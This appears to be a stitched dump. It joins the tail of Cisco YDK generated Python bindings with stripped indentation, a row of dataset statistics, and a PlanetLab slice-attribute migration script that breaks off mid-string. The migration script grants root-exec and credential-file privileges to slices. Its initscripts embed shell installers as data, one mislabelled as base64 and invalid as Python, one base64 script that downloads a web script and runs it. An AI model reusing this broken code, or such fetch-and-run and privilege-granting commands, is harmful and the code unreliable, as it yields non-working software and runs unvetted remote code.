@property
def _common_path(self):
if self.parent is None:
raise YPYModelError('parent is not set . Cannot derive path.')
return self.parent._common_path +'/Cisco-IOS-XR-lib-mpp-oper:peer-address'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if not self.is_config():
return False
if self.af_name is not None:
return True
if self.ipv4_address is not None:
return True
if self.ipv6_address is not None:
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_lib_mpp_oper as meta
return meta._meta_table['ManagementPlaneProtection.Inband.Interfaces.Interface.Protocol.PeerAddress']['meta_info']
@property
def _common_path(self):
if self.parent is None:
raise YPYModelError('parent is not set . Cannot derive path.')
return self.parent._common_path +'/Cisco-IOS-XR-lib-mpp-oper:protocol'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if not self.is_config():
return False
if self.allow is not None:
return True
if self.is_all_peers_allowed is not None:
return True
if self.peer_address is not None:
for child_ref in self.peer_address:
if child_ref._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_lib_mpp_oper as meta
return meta._meta_table['ManagementPlaneProtection.Inband.Interfaces.Interface.Protocol']['meta_info']
@property
def _common_path(self):
if self.interface_name is None:
raise YPYModelError('Key property interface_name is None')
return '/Cisco-IOS-XR-lib-mpp-oper:management-plane-protection/Cisco-IOS-XR-lib-mpp-oper:inband/Cisco-IOS-XR-lib-mpp-oper:interfaces/Cisco-IOS-XR-lib-mpp-oper:interface[Cisco-IOS-XR-lib-mpp-oper:interface-name = ' + str(self.interface_name) + ']'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if not self.is_config():
return False
if self.interface_name is not None:
return True
if self.protocol is not None:
for child_ref in self.protocol:
if child_ref._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_lib_mpp_oper as meta
return meta._meta_table['ManagementPlaneProtection.Inband.Interfaces.Interface']['meta_info']
@property
def _common_path(self):
return '/Cisco-IOS-XR-lib-mpp-oper:management-plane-protection/Cisco-IOS-XR-lib-mpp-oper:inband/Cisco-IOS-XR-lib-mpp-oper:interfaces'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if not self.is_config():
return False
if self.interface is not None:
for child_ref in self.interface:
if child_ref._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_lib_mpp_oper as meta
return meta._meta_table['ManagementPlaneProtection.Inband.Interfaces']['meta_info']
@property
def _common_path(self):
return '/Cisco-IOS-XR-lib-mpp-oper:management-plane-protection/Cisco-IOS-XR-lib-mpp-oper:inband'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if not self.is_config():
return False
if self.interfaces is not None and self.interfaces._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_lib_mpp_oper as meta
return meta._meta_table['ManagementPlaneProtection.Inband']['meta_info']
@property
def _common_path(self):
return '/Cisco-IOS-XR-lib-mpp-oper:management-plane-protection'
def is_config(self):
''' Returns True if this instance represents config data else returns False '''
return False
def _has_data(self):
if not self.is_config():
return False
if self.inband is not None and self.inband._has_data():
return True
if self.outband is not None and self.outband._has_data():
return True
return False
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_lib_mpp_oper as meta
return meta._meta_table['ManagementPlaneProtection']['meta_info']
class Ipv4Identity(MppAfIdBaseIdentity):
"""
IPv4 address family
"""
_prefix = 'Cisco-IOS-XR-lib-mpp-oper'
_revision = '2015-01-07'
def __init__(self):
MppAfIdBaseIdentity.__init__(self)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_lib_mpp_oper as meta
return meta._meta_table['Ipv4Identity']['meta_info']
class Ipv6Identity(MppAfIdBaseIdentity):
"""
IPv6 address family
"""
_prefix = 'Cisco-IOS-XR-lib-mpp-oper'
_revision = '2015-01-07'
def __init__(self):
MppAfIdBaseIdentity.__init__(self)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_lib_mpp_oper as meta
return meta._meta_table['Ipv6Identity']['meta_info']
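# Usage sketch (an assumption based on the ydk-py CRUD pattern of this
# generation of bindings; not part of the generated module):
#
#     from ydk.services import CRUDService
#     from ydk.providers import NetconfServiceProvider
#     from ydk.models.cisco_ios_xr import Cisco_IOS_XR_lib_mpp_oper as mpp
#
#     provider = NetconfServiceProvider(address='10.0.0.1', port=830,
#                                       username='admin', password='admin',
#                                       protocol='ssh')
#     mgmt = CRUDService().read(provider, mpp.ManagementPlaneProtection())
#     for intf in mgmt.inband.interfaces.interface:
#         print(intf.interface_name)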
| 34.004837
| 269
| 0.490861
| 2,817
| 28,122
| 4.682996
| 0.054668
| 0.057611
| 0.072013
| 0.063069
| 0.900925
| 0.887887
| 0.877047
| 0.864615
| 0.864615
| 0.864615
| 0
| 0.021258
| 0.417893
| 28,122
| 826
| 270
| 34.046005
| 0.784606
| 0.236861
| 0
| 0.841823
| 0
| 0.018767
| 0.140253
| 0.09828
| 0
| 0
| 0
| 0
| 0
| 1
| 0.179625
| false
| 0.002681
| 0.0563
| 0.016086
| 0.557641
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
1efab36210a230086a8000e15777be036b3b0cda
| 36,392
|
py
|
Python
|
tools/slice_attributes.py
|
dreibh/planetlab-lxc-plcapi
|
065dfc54a2b668e99eab343d113f1a31fb154b13
|
[
"BSD-3-Clause"
] | null | null | null |
tools/slice_attributes.py
|
dreibh/planetlab-lxc-plcapi
|
065dfc54a2b668e99eab343d113f1a31fb154b13
|
[
"BSD-3-Clause"
] | null | null | null |
tools/slice_attributes.py
|
dreibh/planetlab-lxc-plcapi
|
065dfc54a2b668e99eab343d113f1a31fb154b13
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env /usr/bin/plcsh
#
# Convert old planetlab3 slice attributes and initscripts to new
# planetlab4 ones.
#
# Mark Huang <mlhuang@cs.princeton.edu>
# Copyright (C) 2006 The Trustees of Princeton University
#
import re
import base64
# Convert nm_net_{exempt_,}{min,max}_rate (bps) to
# net_{i2_,}{min,max}_rate and net_{i2_,}{min,max}_rate (kbps)
rename = {'nm_net_min_rate': 'net_min_rate',
'nm_net_max_rate': 'net_max_rate',
'nm_net_exempt_min_rate': 'net_i2_min_rate',
'nm_net_exempt_max_rate': 'net_i2_max_rate'}
for slice_attribute in GetSliceTags({'name': list(rename.keys())}):
id = slice_attribute['slice_attribute_id']
name = slice_attribute['name']
slice_id = slice_attribute['slice_id']
# Convert bps to kbps
bps = int(slice_attribute['value'])
kbps = bps / 1000
# Add the new attribute
if GetSlices([slice_id]):
AddSliceTag(slice_id, rename[name], str(kbps))
# Delete the old attribute
DeleteSliceTag(id)
# Convert nm_net_{exempt_,}avg_rate to
# net_{i2_,}max_kbyte and net_{i2_,}thresh_kbyte
rename = {'nm_net_avg_rate': {'max': 'net_max_kbyte',
'thresh': 'net_thresh_kbyte'},
'nm_net_exempt_avg_rate': {'max': 'net_i2_max_kbyte',
'thresh': 'net_i2_thresh_kbyte'}}
for slice_attribute in GetSliceTags({'name': list(rename.keys())}):
id = slice_attribute['slice_attribute_id']
name = slice_attribute['name']
slice_id = slice_attribute['slice_id']
# Convert bps to 80% and 100% of max bytes per day
bps = int(slice_attribute['value'])
max_kbyte = bps * 24 * 60 * 60 / 8 / 1000
thresh_kbyte = int(0.8 * max_kbyte)
# Add the new attribute
if GetSlices([slice_id]):
AddSliceTag(slice_id, rename[name]['max'], str(max_kbyte))
AddSliceTag(slice_id, rename[name]['thresh'], str(thresh_kbyte))
# Delete the old attribute
DeleteSliceTag(id)
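# Worked example (illustrative): an old nm_net_avg_rate of 1,000,000 bps
# converts to
#   max_kbyte    = 1000000 * 24 * 60 * 60 / 8 / 1000 = 10,800,000
#   thresh_kbyte = int(0.8 * 10800000)               =  8,640,000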
# Convert plc_slice_state
for slice_attribute in GetSliceTags({'name': 'plc_slice_state'}):
id = slice_attribute['slice_attribute_id']
name = slice_attribute['name']
slice_id = slice_attribute['slice_id']
# Add the new attribute
if GetSlices([slice_id]):
if slice_attribute['value'] == "suspended":
AddSliceTag(slice_id, 'enabled', "0")
else:
AddSliceTag(slice_id, 'enabled', "1")
# Delete the old attribute
DeleteSliceTag(id)
# Straight renames
rename = {'nm_cpu_share': 'cpu_share',
'nm_disk_quota': 'disk_max',
'nm_net_share': 'net_share',
'nm_net_exempt_share': 'net_i2_share',
'nm_net_max_byte': 'net_max_kbyte',
'nm_net_max_thresh_byte': 'net_thresh_kbyte',
'nm_net_max_exempt_byte': 'net_i2_max_kbyte',
'nm_net_max_thresh_exempt_byte': 'net_i2_thresh_kbyte'}
for slice_attribute in GetSliceTags({'name': list(rename.keys())}):
id = slice_attribute['slice_attribute_id']
name = slice_attribute['name']
slice_id = slice_attribute['slice_id']
# Pass straight through
value = slice_attribute['value']
# Add the new attribute
if GetSlices([slice_id]):
AddSliceTag(slice_id, rename[name], value)
# Delete the old attribute
DeleteSliceTag(id)
# Update plc_ticket_pubkey attribute
for slice_attribute in GetSliceTags({'name': "plc_ticket_pubkey"}):
id = slice_attribute['slice_attribute_id']
UpdateSliceTag(id, """
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDKXa72MEKDAnVyzEpKOB1ot2eW
xG/TG2aa7q/2oy1xf5XMmU9H9uKwO+GoUeinp1BSxgkVRF0VhEGGaqKR9kYQzX0k
ht4+P2hAr+UyU4cp0NxV4xfmyAbrNKuHVjawMUCu5BH0IkBUC/89ckxk71oROnak
FbI7ojUezSGr4aVabQIDAQAB
""".lstrip())
# Delete _deleted and deprecated slice attributes and types
for attribute_type in GetSliceTagTypes():
id = attribute_type['attribute_type_id']
name = attribute_type['name']
if name == 'general_prop_share' or \
re.match('nm_', name) or \
re.search('_deleted$', name):
DeleteSliceTagType(id)
# N.B. Automatically deletes all slice attributes of this type
# Add Proper ops
proper_ops = [
    # give Stork permission to mount and unmount client dirs
    ('arizona_stork', 'mount_dir'),
    ('arizona_stork', 'set_file_flags pass, "1"'),
    ('arizona_stork', 'set_file_flags_list "1"'),
    ('arizona_stork', 'bind_socket sockname=64?:*'),
    ('arizona_stork2', 'mount_dir'),
    ('arizona_stork2', 'set_file_flags pass, "1"'),
    ('arizona_stork2', 'set_file_flags_list "1"'),
    ('arizona_stork2', 'bind_socket sockname=64?:*'),
    # give CoMon the necessary permissions to run slicestat
    ('princeton_slicestat', 'exec "root", pass, "/usr/local/planetlab/bin/pl-ps", none'),
    ('princeton_slicestat', 'exec "root", pass, "/usr/sbin/vtop", "bn1", none'),
    ('princeton_slicestat', 'open_file file=/proc/virtual/*/cacct'),
    ('princeton_slicestat', 'open_file file=/proc/virtual/*/limit'),
    ('princeton_comon', 'open_file file=/var/log/secure'),
    ('princeton_comon', 'exec "root", pass, "/bin/df", "/vservers", none'),
    # give pl_slicedir access to /etc/passwd
    ('pl_slicedir', 'open_file pass, "/etc/passwd"'),
    # nyu_d are building a DNS demux so give them access to port 53
    ('nyu_d', 'bind_socket'),
    ('nyu_oasis', 'bind_socket'),
    # QA slices need to be able to create and delete bind-mounts
    ('pl_qa_0', 'mount_dir'),
    ('pl_qa_1', 'mount_dir'),
    # irb_snort needs packet sockets for tcpdump
    ('irb_snort', 'create_socket'),
    # uw_ankur is using netlink sockets to do the same thing as netflow
    ('uw_ankur', 'create_socket'),
    # cornell_codons gets access to port 53 for now
    ('cornell_codons', 'create_socket'),
    # give Mic Bowman's conf-monitor service read-only access to root fs
    # and the ability to run df
    ('idsl_monitor', 'mount_dir "root:/", pass, "ro"'),
    ('idsl_monitor', 'unmount'),
    ('idsl_monitor', 'exec "root", pass, "/bin/df", "-P", "/", "/vservers", none'),
    # give Shark access to port 111 to run portmap
    # and port 955 to run mount
    ('nyu_shkr', 'bind_socket'),
    ('nyu_shkr', 'mount_dir "nfs:**:**"'),
    ('nyu_shkr', 'exec "root", pass, "/bin/umount", "-l", "/vservers/nyu_shkr/**", none'),
    # give tsinghua_lgh access to restricted ports
    ('tsinghua_lgh', 'bind_socket'),
    # CoDeeN needs port 53 too
    ('princeton_codeen', 'bind_socket sockname=53:*'),
    # give ucin_load access to /var/log/wtmp
    ('ucin_load', 'open_file file=/var/log/wtmp*'),
    # give google_highground permission to bind port 81 (and raw sockets)
    ('google_highground', 'bind_socket'),
    # pl_conf needs access to port 814
    ('pl_conf', 'bind_socket sockname=814:*'),
    ('pl_conf', 'open file=/home/*/.ssh/authorized_keys'),
    # give princeton_visp permission to read all packets sent through the
    # tap0 device
    ('princeton_visp', 'open file=/dev/net/tun, flags=rw'),
    # The PLB group needs the BGP port
    ('princeton_iias', 'bind_socket sockname=179:*'),
    ('princeton_visp', 'bind_socket sockname=179:*'),
    ('mit_rcp', 'bind_socket sockname=179:*'),
    ('princeton_bgpmux', 'bind_socket sockname=179:*'),
    ('princeton_bgpmux2', 'bind_socket sockname=179:*'),
    # PL-VINI group
    ('mit_rcp', 'exec "root", pass, "/usr/bin/chrt"'),
    ('princeton_iias', 'exec "root", pass, "/usr/bin/chrt"'),
    # Tycoon needs access to /etc/passwd to determine Slicename->XID mappings
    ('hplabs_tycoon_aucd', 'open_file file=/etc/passwd'),
]
for slice, op in proper_ops:
    try:
        AddSliceTag(slice, 'proper_op', op)
    except Exception as err:
        print("Warning: %s:" % slice, err)
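# A failed AddSliceTag here (e.g. a slice named in proper_ops that no longer
# exists) is reported as a warning rather than aborting the migration.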
initscripts = dict([(initscript['initscript_id'], initscript) for initscript in [{'initscript_id': 8, 'script': '#! /bin/sh

# <Program Name>
#    bindscript
#
# <Author>
#    Jeffry Johnston and Jeremy Plichta
#
# <Purpose>
#    Downloads and installs stork on a node.

# save original PWD
OLDPWD=$PWD

# error reporting function
error()
{
   echo
   echo "Please E-mail stork-support@cs.arizona.edu if you believe you have" 
   echo "received this message in error."

   # get rid of CERT file
   if [ -f $CERT ]
   then
      rm -f $CERT > /dev/null
   fi

   # restore original PWD
   cd $OLDPWD
   exit 1
}

CERT=`pwd`/tempcrtfile

#functions

###
### createCertificate()
###    prints out the equifax certificate to use and stores
###    the file name in $CERT
###
function createCertificate(){
cat > $CERT <<EQUIFAX
-----BEGIN CERTIFICATE-----
MIICkDCCAfmgAwIBAgIBATANBgkqhkiG9w0BAQQFADBaMQswCQYDVQQGEwJV
UzEcMBoGA1UEChMTRXF1aWZheCBTZWN1cmUgSW5jLjEtMCsGA1UEAxMkRXF1
aWZheCBTZWN1cmUgR2xvYmFsIGVCdXNpbmVzcyBDQS0xMB4XDTk5MDYyMTA0
MDAwMFoXDTIwMDYyMTA0MDAwMFowWjELMAkGA1UEBhMCVVMxHDAaBgNVBAoT
E0VxdWlmYXggU2VjdXJlIEluYy4xLTArBgNVBAMTJEVxdWlmYXggU2VjdXJl
IEdsb2JhbCBlQnVzaW5lc3MgQ0EtMTCBnzANBgkqhkiG9w0BAQEFAAOBjQAw
gYkCgYEAuucXkAJlsTRVPEnCUdXfp9E3j9HngXNBUmCbnaEXJnitx7HoJpQy
td4zjTov2/KaelpzmKNc6fuKcxtc58O/gGzNqfTWK8D3+ZmqY6KxRwIP1ORR
OhI8bIpaVIRw28HFkM9yRcuoWcDNM50/o5brhTMhHD4ePmBudpxnhcXIw2EC
AwEAAaNmMGQwEQYJYIZIAYb4QgEBBAQDAgAHMA8GA1UdEwEB/wQFMAMBAf8w
HwYDVR0jBBgwFoAUvqigdHJQa0S3ySPY+6j/s1draGwwHQYDVR0OBBYEFL6o
oHRyUGtEt8kj2Puo/7NXa2hsMA0GCSqGSIb3DQEBBAUAA4GBADDiAVGqx+pf
2rnQZQ8w1j7aDRRJbpGTJxQx78T3LUX47Me/okENI7SS+RkAZ70Br83gcfxa
z2TE4JaY0KNA4gGK7ycH8WUBikQtBmV1UsCGECAhX2xrD2yuCRyv8qIYNMR1
pHMc8Y3c7635s3a0kr/clRAevsvIO1qEYBlWlKlV
-----END CERTIFICATE----- 
EQUIFAX
}

###
### overWriteConf()
###	overwrite the default stork.conf file
###     that was installed by the rpm package.
###     this is a temporary hack because I need
###     to change the nestport and I don't know
###     enough to repackage the rpm with the
###     correct settings
function overWriteConf(){
cat > /usr/local/stork/etc/stork.conf <<ENDOFFILE
pacman=/usr/local/stork/bin/pacman
dtd-packages=/usr/local/stork/bin/packages.dtd
dtd-groups=/usr/local/stork/bin/groups.dtd
storknestupdatelistenerport=649

#bittorrenttrackerhost=quadrus.cs.arizona.edu
bittorrenttrackerhost=nr06.cs.arizona.edu

bittorrenttrackerport=6880
bittorrentuploadrate=0
bittorrentseedlookuptimeout=30

#packagerepository = quadrus.cs.arizona.edu/PlanetLab/V3|dist, stable
packagerepository = nr06.cs.arizona.edu/PlanetLab/V3|dist, stable
#packageinforepository = quadrus.cs.arizona.edu/PlanetLab/V3/stork.info
packageinforepository = nr06.cs.arizona.edu/PlanetLab/V3/stork.info

username = PlanetLab
publickeyfile = /usr/local/stork/var/keys/PlanetLab.publickey
packagemanagers = nestrpm, rpm, targz
transfermethod= nest,bittorrent,coblitz,coral,http,ftp
nestport=6000
tarpackinfopath=/usr/local/stork/var/tarinfo
ENDOFFILE
} 


###
### downloadNR06()
###    download a file from nr06 using curl
###
### args: 
###       - the path of the file you wish to download
###         relative from https://nr06.cs.arizona.edu
###       - the file to save it to
###       - returned value as specified in verifyDownload
function downloadNR06(){
    curl --cacert $CERT https://nr06.cs.arizona.edu/$1 -o $2 2>/dev/null
    verifyDownload $2 $3
}

###
### verifyDownload()
###     verify that a file that was just downloaded with downloadNR06
###     was downloaded correctly. Since we are getting stuff from an
###     http server, we are assuming that if we get a 404 response
###     the page we want does not exist. Also, if the output file
###     does not exist, that means that only headers were returned
###     without any content. This too is an invalid file download
###
### args:
###       - the file to verify
###       - return variable, will have 1 if fail 0 if good
###
function verifyDownload(){
    eval "$2=0"
    if [ ! -f $1 ];
    then
        eval "$2=1"
    elif grep '404 Not Found' $1 > /dev/null
    then
	rm -f $1
        eval "$2=1"
    else
        eval "$2=0"
    fi
}


# check for root user
if [ $UID -ne "0" ]
then
   echo "You must run this program with root permissions..."
   error
fi   
 
# clean up in case this script was run before and failed
rm -rf /tmp/stork &> /dev/null

# create /tmp/stork directory
mkdir /tmp/stork 
if [ $? -ne "0" ]
then
   echo
   echo "Could not create the /tmp/stork directory..."
   error
fi

# export our root directory to Stork
echo "arizona_stork2" > /.exportdir
if [ $? -ne "0" ]
then
   echo
   echo "Could not create the /.exportdir file..."
   error
fi
 
# tell stork that we want to be served
if [ -f /etc/slicename ]
then
   SLICENAME=`cat /etc/slicename`
else 
   SLICENAME=$USER
fi
wget -O /tmp/stork/$SLICENAME "http://localhost:648/$SLICENAME\$bindscript"

# verify that the download was successful
if [ ! -f /tmp/stork/$SLICENAME -o $? -ne 0 ]
then
   echo
   echo "Stork doesn't seem to be running on this node..."
   error
fi

# wait for stork slice 
echo "Waiting for Stork to accept our binding..."
while [ ! -f /tmp/stork/stork_says_go ]
do
   sleep 1
done

# change PWD to the /tmp/stork directory 
cd /tmp/stork
if [ $? -ne "0" ]
then
   echo
   echo "Could not access the /tmp/stork directory..."
   error
fi

# confirm that packages to be installed actually exist
if echo *.rpm | grep '*' > /dev/null
then
   echo
   echo "Error: Stork package download failed..."
   error
fi

# remove Stork packages and files
echo
echo "Removing Stork files..."

# build a list of packages to remove
packages=""
for filename in *.rpm
do
  # convert filename to a package name
  pack=`rpm -qp --qf "%{NAME}\n" $filename`
  if [ $? -eq "0" ]
  then
    packages="$packages $pack"
  fi
done   

# remove old Stork packages
rpm -e $packages &> /dev/null

# remove anything left in /usr/local/stork/bin
rm -rf /usr/local/stork/bin/* &> /dev/null 

# install Stork packages
echo
echo "Installing packages..." 

# build a list of packages to install
packages=""
for filename in *.rpm
do
  packages="$packages $filename"
done   

# install the new stork packages
rpm -i $packages

# report package installation errors
if [ $? -ne "0" ]
then
  echo "Warning: Possible error installing Stork packages..."
fi

# restore original PWD
cd $OLDPWD

# clean up temporary files
rm -rf /tmp/stork &> /dev/null

# SEE TO-DO 1
#create the equifax certificate to use for curl
#createCertificate

# TO-DO 1
# implement the below in the beginning of stork.py
#attempt to download the user's public key from the repository
#downloadNR06 "user-upload/pubkeys/$SLICENAME.publickey" "/usr/local/stork/var/$SLICENAME.publickey" RET

#if [ $RET -ne 0 ];
#then
#   echo
#   echo "Could not fetch your public key from the repository."
#   echo "If you want to upload one for the next time you run"
#   echo "the initscript please visit"
#   echo "http://nr06.cs.arizona.edu/testphp/upload.php"
#   echo
#fi

#attempt to download the user's stork.conf file from the repository
#downloadNR06 "user-upload/conf/$SLICENAME.stork.conf" "/usr/local/stork/etc/stork.conf.users" RET

#if [ $RET -ne 0 ];
#then
#   echo
#   echo "Could not fetch your stork.conf file from the repository."
#   echo "If you want to upload one for the next time you run"
#   echo "the initscript please visit"
#   echo "http://nr06.cs.arizona.edu/testphp/upload.php"
#   echo "Stork will work without a configuration file but to make one"
#   echo "please place a file named stork.conf in /usr/local/stork/etc"
#   echo "refer to the manual for more directions or email:"
#   echo "stork-support@cs.arizona.edu for additional assistance."
#   echo
#fi

#don't need to overwrite the default conf file
#because it should be fixed in the new rpms
#overWriteConf

# run stork to update keyfiles and download package lists
echo
echo "Attempting to communicate with stork..."
if stork 
then
   echo
   echo "Congratulations, you have successfully bound to stork!"
   echo
   echo "For help, you may type stork --help"
   echo
   #echo "There is also a storkquery command that will provide information"
   #echo "about packages in the repository."
   echo
   echo "For more help, visit the stork project online at"
   echo "http://www.cs.arizona.edu/stork/.  Please contact"
   echo "stork-support@cs.arizona.edu for additional assistance." 
   #rm -f $CERT > /dev/null
else
   echo
   echo "An error occurred during install finalization...  Please contact"
   echo "stork-support@cs.arizona.edu for assistance."
   #rm -f $CERT > /dev/null
   exit 1
fi

# done
exit 0
', 'name': 'arizona_stork_2', 'encoding': 'base64'}, {'initscript_id': 9, 'script': 'IyEvYmluL2Jhc2gNCmNkIC8NCnJtIC1mIHN0YXJ0X3B1cnBsZQ0Kd2dldCBodHRwOi8vd3d3LmNzLnByaW5jZXRvbi5lZHUvfmRlaXNlbnN0L3B1cnBsZS9zdGFydF9wdXJwbGUNCmNobW9kIDc1NSBzdGFydF9wdXJwbGUNCnN1IHByaW5jZXRvbl9wdXJwbGUgLWMgJy4vc3RhcnRfcHVycGxlJw0K', 'name': 'princeton_purple', 'encoding': 'base64'}, {'initscript_id': 6, 'script': 'IyEgL2Jpbi9zaA0KDQojIHNhdmUgb3JpZ2luYWwgUFdEDQpPTERQV0Q9JFBXRA0KDQojIGVycm9yIHJlcG9ydGluZyBmdW5jdGlvbg0KZXJyb3IoKQ0Kew0KICAgZWNobw0KICAgZWNobyAiUGxlYXNlIEUtbWFpbCBzdG9yay1zdXBwb3J0QGNzLmFyaXpvbmEuZWR1IGlmIHlvdSBiZWxpZXZlIHlvdSBoYXZlIiANCiAgIGVjaG8gInJlY2VpdmVkIHRoaXMgbWVzc2FnZSBpbiBlcnJvci4iDQoNCiAgICMgcmVzdG9yZSBvcmlnaW5hbCBQV0QNCiAgIGNkICRPTERQV0QNCiAgIGV4aXQgMQ0KfQ0KDQojIGNoZWNrIGZvciByb290IHVzZXINCmlmIFsgJFVJRCAtbmUgIjAiIF0NCnRoZW4NCiAgIGVjaG8gJ1lvdSBtdXN0IGJlIHJvb3QgdG8gcnVuIHRoaXMgcHJvZ3JhbS4uLicNCiAgIGVycm9yDQpmaSAgIA0KIA0KIyBDbGVhbiB1cCBpbiBjYXNlIEkgcmFuIHRoaXMgYmVmb3JlDQpybSAtZiAvdG1wL3N0b3JrKiA+IC9kZXYvbnVsbCAyPiYxDQoNCiMgRmlyc3Qgb2YgYWxsIGV4cG9ydCBvdXIgcm9vdCBkaXJlY3RvcnkgdG8gU3RvcmsNCmVjaG8gImFyaXpvbmFfc3RvcmsiID4gLy5leHBvcnRkaXINCiANCiMgTm93IHRlbGwgc3RvcmsgdGhhdCB3ZSB3YW50IHRvIGJlIHNlcnZlZA0KaWYgWyAtZiAvZXRjL3NsaWNlbmFtZSBdDQp0aGVuDQogICBTTElDRU5BTUU9YGNhdCAvZXRjL3NsaWNlbmFtZWANCmVsc2UgDQogICBTTElDRU5BTUU9JFVTRVINCmZpDQoNCndnZXQgaHR0cDovL2xvY2FsaG9zdDo2NDAvJFNMSUNFTkFNRQ0KDQojIGNoZWNrIHRvIG1ha2Ugc3VyZSB0aGUgZG93bmxvYWQgd2FzIHN1Y2Nlc3NmdWwNCmlmIFsgISAtZiAkU0xJQ0VOQU1FIC1vICQ/IC1uZSAwIF0NCnRoZW4NCiAgIGVjaG8NCiAgIGVjaG8gIlN0b3JrIGRvZXNuJ3Qgc2VlbSB0byBiZSBydW5uaW5nIG9uIHRoaXMgbm9kZS4uLiINCiAgIGVycm9yDQpmaQ0KDQojIHdhaXQgZm9yIHN0b3JrIHNsaWNlIA0KZWNobyAiV2FpdGluZyBmb3IgU3RvcmsgdG8gYWNjZXB0IG91ciBiaW5kaW5nLi4uIg0Kd2hpbGUgWyAhIC1mIC90bXAvc3Rvcmtfc2F5c19nbyBdDQpkbw0KICAgc2xlZXAgMQ0KZG9uZQ0KDQojIGNoYW5nZSBQV0QgdG8gdGhlIC90bXAgZGlyZWN0b3J5IA0KY2QgL3RtcA0KaWYgWyAkPyAtbmUgIjAiIF0NCnRoZW4NCiAgIGVjaG8NCiAgIGVjaG8gIkNvdWxkIG5vdCBhY2Nlc3MgdGhlIC90bXAgZGlyZWN0b3J5Li4uIg0KICAgZXJyb3INCmZpDQoNCiMgY29uZmlybSB0aGF0IHBhY2thZ2VzIHRvIGJlIGluc3RhbGxlZCBhY3R1YWxseSBleGlzdA0KaWYgZWNobyAqLnJwbSB8IGdyZXAgJyonID4gL2Rldi9udWxsDQp0aGVuDQogICBlY2hvDQogICBlY2hvICJFcnJvcjogU3RvcmsgcGFja2FnZSBkb3dubG9hZCBmYWlsZWQuLi4iDQogICBlcnJvcg0KZmkNCg0KIyBpbnN0YWxsIFN0b3JrIHBhY2thZ2VzDQplY2hvICJJbnN0YWxsaW5nIHBhY2thZ2VzLi4uIiANCmZvciBwYWNrIGluICoucnBtDQpkbw0KICAgIyByZW1vdmUgdGhlIG9sZCBzdG9yayBwYWNrYWdlLCBpZiBhbnkNCiAgIHJwbSAtZSBgcnBtIC1xcCAtLXFmICIle05BTUV9XG4iICRwYWNrYCA+IC9kZXYvbnVsbCAyPiYxDQoNCiAgICMgcmVtb3ZlIGFueXRoaW5nIGxlZnQgaW4gL3Vzci9sb2NhbC9zdG9yay9iaW4NCiAgIHJtIC1yZiAvdXNyL2xvY2FsL3N0b3JrL2Jpbi8qID4gL2Rldi9udWxsIDI+JjENCg0KICAgIyBpbnN0YWxsIHRoZSBuZXcgc3RvcmsgcGFja2FnZQ0KICAgcnBtIC1pICRwYWNrDQoNCiAgICMgcmVwb3J0IHBhY2thZ2UgaW5zdGFsbGF0aW9uIGVycm9ycw0KICAgaWYgWyAkPyAtbmUgIjAiIF0NCiAgIHRoZW4NCiAgICAgZWNobyAiV2FybmluZzogUG9zc2libGUgZXJyb3IgaW5zdGFsbGluZyBTdG9yayBwYWNrYWdlOiAkcGFjay4uLiINCiAgIGZpDQpkb25lDQoNCiMgcmVzdG9yZSBvcmlnaW5hbCBQV0QNCmNkICRPTERQV0QNCg0KIyBjbGVhbiB1cCB0ZW1wb3JhcnkgZmlsZXMNCnJtIC1mIC90bXAvc3RvcmsqID4gL2Rldi9udWxsIDI+JjENCnJtICRTTElDRU5BTUUqIA0KDQojIHJ1biBzdG9yayB0byB1cGRhdGUga2V5ZmlsZXMgYW5kIGRvd25sb2FkIHBhY2thZ2UgbGlzdHMNCmVjaG8gIkF0dGVtcHRpbmcgdG8gY29tbXVuaWNhdGUgd2l0aCBzdG9yay4uLiINCmlmIHN0b3JrIA0KdGhlbg0KICAgZWNobw0KICAgZWNobyAiQ29uZ3JhdHVsYXRpb25zLCB5b3UgaGF2ZSBzdWNjZXNzZnVsbHkgYm91bmQgdG8gc3RvcmshIg0KICAgZWNobw0KICAgZWNobyAiRm9yIGhlbHAsIHlvdSBtYXkgdHlwZSBzdG9yayAtLWhlbHAgIg0KICAgZWNobw0KICAgZWNobyAiVGhlcmUgaXMgYWxzbyBhIHN0b3JrcXVlcnkgY29tbWFuZCB0aGF0IHdpbGwgcHJvdmlkZSBpbmZvcm1hdGlvbiINCiAgIGVjaG8gImFib3V0IHBh
